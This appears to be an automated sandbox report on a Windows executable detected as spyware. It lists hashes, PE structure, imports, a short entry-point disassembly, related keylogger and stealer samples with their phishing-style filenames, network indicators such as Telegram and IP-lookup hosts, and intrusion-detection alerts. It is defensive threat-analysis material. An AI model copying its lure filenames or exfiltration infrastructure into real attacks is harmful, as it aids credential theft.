                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:13
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.winEXE@1/0@4/4
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 172
                                                                                            • Number of non-executed functions: 126
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                            • VT rate limit hit for: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
| Time | Type | Description |
|---|---|---|
| 03:46:56 | API Interceptor | 10584770x Sleep call for process: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 132.226.8.169 | PACKING_LIST_DOCUMENT_BQG9390309727.scr.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/ |
| | EPTMAcgvNZ.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | checkip.dyndns.org/ |
| | INV-0542.pdf.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/ |
| | dekont 25.11.2024 PDF.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/ |
| | order requirements CIF-TRC809910645210.exe | malicious | MassLogger RAT | checkip.dyndns.org/ |
| | MC8017774DOCS.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/ |
| | Papyment_Advice.exe | malicious | MassLogger RAT | checkip.dyndns.org/ |
| | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/ |
| | sosoliso.exe | malicious | MassLogger RAT | checkip.dyndns.org/ |
                                                                                            order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            149.154.167.220Dysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        INVITATION TO BID as on 25 NOV 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                          EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                            INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                                104.21.67.152RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                        denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    reallyfreegeoip.orgVSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Dysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    PACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    api.telegram.orgDysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    INVITATION TO BID as on 25 NOV 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    the.drillmmcsnk.topMC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 5.182.211.149
                                                                                                                                    checkip.dyndns.com173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    Dysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    PACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    TELEGRAMRUDysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    INVITATION TO BID as on 25 NOV 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    CLOUDFLARENETUSgeHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.67.187.200
                                                                                                                                    VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Dysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                    • 172.67.213.249
                                                                                                                                    PACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                    • 172.67.202.26
                                                                                                                                    Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                    • 172.67.202.26
                                                                                                                                    RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.133.70
                                                                                                                                    Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                    • 172.67.202.26
                                                                                                                                    UTMEMUSVSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    PACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    SKB-ENTERPRISENLDoc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 5.182.211.149
                                                                                                                                    MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 5.182.211.149
                                                                                                                                    No context
                                                                                                                                    No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.307112254057628
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
File size: 207'872 bytes
MD5: 17fde190e651aee3335ed55eeaa1a6db
SHA1: 8bb498b5d6fc4a58043d9e51d80790083cecd1f7
SHA256: a7e6101a68d513260f4e380b8d9bc66f90cee222d6ef157201884f6f32ce4cf3
SHA512: f4df0edfe99784bddad1ae3f275afe1d3dbff0a2d75531de9771558e97f60621353dbd08f6369e7c41feb38fdf2760737a4ca5da68110cef44bd5320ec7ab97f
SSDEEP: 3072:UDKW1LgppLRHMY0TBfJvjcTp5X+5y76khunx2ZZg1sl7bYk:UDKW1Lgbdl0TBBvjc/+5yGkYnx+gKlbH
TLSH: 1714BE1075C1C1B3C4B7103044EACB7A9A3A7572076A96D7B7DC2BBA6F213D1A3362C9
Icon Hash: 00928e8e8686b000
Entrypoint: 0x40cd2f
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x5000A574 [Fri Jul 13 22:47:16 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: bf5a4aa99e5b160f8521cadd6bfe73b8
                                                                                                                                    Instruction
                                                                                                                                    call 00007FDDFCC06886h
                                                                                                                                    jmp 00007FDDFCC00A49h
                                                                                                                                    mov edi, edi
                                                                                                                                    push ebp
                                                                                                                                    mov ebp, esp
                                                                                                                                    sub esp, 20h
                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                    push esi
                                                                                                                                    push edi
                                                                                                                                    push 00000008h
                                                                                                                                    pop ecx
                                                                                                                                    mov esi, 0041F058h
                                                                                                                                    lea edi, dword ptr [ebp-20h]
                                                                                                                                    rep movsd
                                                                                                                                    mov dword ptr [ebp-08h], eax
                                                                                                                                    mov eax, dword ptr [ebp+0Ch]
                                                                                                                                    pop edi
                                                                                                                                    mov dword ptr [ebp-04h], eax
                                                                                                                                    pop esi
                                                                                                                                    test eax, eax
                                                                                                                                    je 00007FDDFCC00BAEh
                                                                                                                                    test byte ptr [eax], 00000008h
                                                                                                                                    je 00007FDDFCC00BA9h
                                                                                                                                    mov dword ptr [ebp-0Ch], 01994000h
                                                                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                                                                    push eax
                                                                                                                                    push dword ptr [ebp-10h]
                                                                                                                                    push dword ptr [ebp-1Ch]
                                                                                                                                    push dword ptr [ebp-20h]
                                                                                                                                    call dword ptr [0041B000h]
                                                                                                                                    leave
                                                                                                                                    retn 0008h
                                                                                                                                    ret
                                                                                                                                    mov eax, 00413563h
                                                                                                                                    mov dword ptr [004228E4h], eax
                                                                                                                                    mov dword ptr [004228E8h], 00412C4Ah
                                                                                                                                    mov dword ptr [004228ECh], 00412BFEh
                                                                                                                                    mov dword ptr [004228F0h], 00412C37h
                                                                                                                                    mov dword ptr [004228F4h], 00412BA0h
                                                                                                                                    mov dword ptr [004228F8h], eax
                                                                                                                                    mov dword ptr [004228FCh], 004134DBh
                                                                                                                                    mov dword ptr [00422900h], 00412BBCh
                                                                                                                                    mov dword ptr [00422904h], 00412B1Eh
                                                                                                                                    mov dword ptr [00422908h], 00412AABh
                                                                                                                                    ret
                                                                                                                                    mov edi, edi
                                                                                                                                    push ebp
                                                                                                                                    mov ebp, esp
                                                                                                                                    call 00007FDDFCC00B3Bh
                                                                                                                                    call 00007FDDFCC073C0h
                                                                                                                                    cmp dword ptr [ebp+00h], 00000000h
                                                                                                                                    Programming Language:
                                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                                    • [C++] VS2008 build 21022
                                                                                                                                    • [ C ] VS2008 build 21022
                                                                                                                                    • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x215b4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x26000 | 0x10a78 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1b1c0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x20da0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1b000 | 0x184 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x19718 | 0x19800 | cadcc8bee8523060769be8bde6055497 | False | 0.5789388020833334 | data | 6.74853538687006 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1b000 | 0x6db4 | 0x6e00 | 5826801f33fc1b607aa8e942aa92e9fa | False | 0.5467329545454546 | data | 6.442956247632331 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x22000 | 0x30c0 | 0x1600 | 2fe51a72ede820cd7cf55a77ba59b1f4 | False | 0.3126775568181818 | data | 3.2625868398009703 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x26000 | 0x10a78 | 0x10c00 | a1132eab1909b1f92211aecb70cd0d74 | False | 0.9645522388059702 | data | 7.97043080440538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_RCDATA | 0x26124 | 0xf9b9 | data | | | 1.0004067011841262
RT_RCDATA | 0x35ae0 | 0x20 | data | | | 1.28125
RT_VERSION | 0x35b00 | 0x31c | data | | | 0.4296482412060301
RT_MANIFEST | 0x35e1c | 0xc5b | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.3926651912741069
DLL | Import
KERNEL32.dll | RaiseException, GetLastError, MultiByteToWideChar, lstrlenA, InterlockedDecrement, GetProcAddress, LoadLibraryA, FreeResource, SizeofResource, LockResource, LoadResource, FindResourceA, GetModuleHandleA, Module32Next, CloseHandle, Module32First, CreateToolhelp32Snapshot, GetCurrentProcessId, SetEndOfFile, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, GetLocaleInfoA, HeapFree, GetProcessHeap, HeapAlloc, GetCommandLineA, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, ReadFile, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, FlushFileBuffers, SetFilePointer, SetHandleCount, GetFileType, GetStartupInfoA, RtlUnwind, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CompareStringA, CompareStringW, SetEnvironmentVariableA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
ole32.dll | OleInitialize
OLEAUT32.dll | SafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector, VariantClear, VariantInit, SysFreeString, SysAllocString
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-26T09:46:53.806454+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49699 | 132.226.8.169 | 80 | TCP
2024-11-26T09:46:56.759609+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49699 | 132.226.8.169 | 80 | TCP
2024-11-26T09:46:58.437508+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49701 | 104.21.67.152 | 443 | TCP
2024-11-26T09:47:00.103356+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49702 | 132.226.8.169 | 80 | TCP
2024-11-26T09:47:09.057527+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49718 | 104.21.67.152 | 443 | TCP
2024-11-26T09:47:20.265217+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49754 | 104.21.67.152 | 443 | TCP
2024-11-26T09:47:23.570571+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49761 | 104.21.67.152 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                    Nov 26, 2024 09:47:19.820380926 CET44349754104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:20.265223026 CET44349754104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:20.265320063 CET44349754104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:20.265372992 CET49754443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:20.265878916 CET49754443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:20.268944979 CET4974880192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:20.270000935 CET4976080192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:20.390301943 CET8049748132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:20.390389919 CET4974880192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:20.391431093 CET8049760132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:20.391508102 CET4976080192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:20.391710997 CET4976080192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:20.511706114 CET8049760132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:21.848341942 CET8049760132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:21.850975037 CET49761443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:21.851011038 CET44349761104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:21.851171017 CET49761443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:21.851473093 CET49761443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:21.851485014 CET44349761104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:21.900346041 CET4976080192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:23.110855103 CET44349761104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:23.112530947 CET49761443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:23.112555981 CET44349761104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:23.570593119 CET44349761104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:23.570657015 CET44349761104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:23.570715904 CET49761443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:23.571186066 CET49761443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:23.623152018 CET4976080192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:23.743645906 CET8049760132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:23.747275114 CET4976080192.168.2.7132.226.8.169
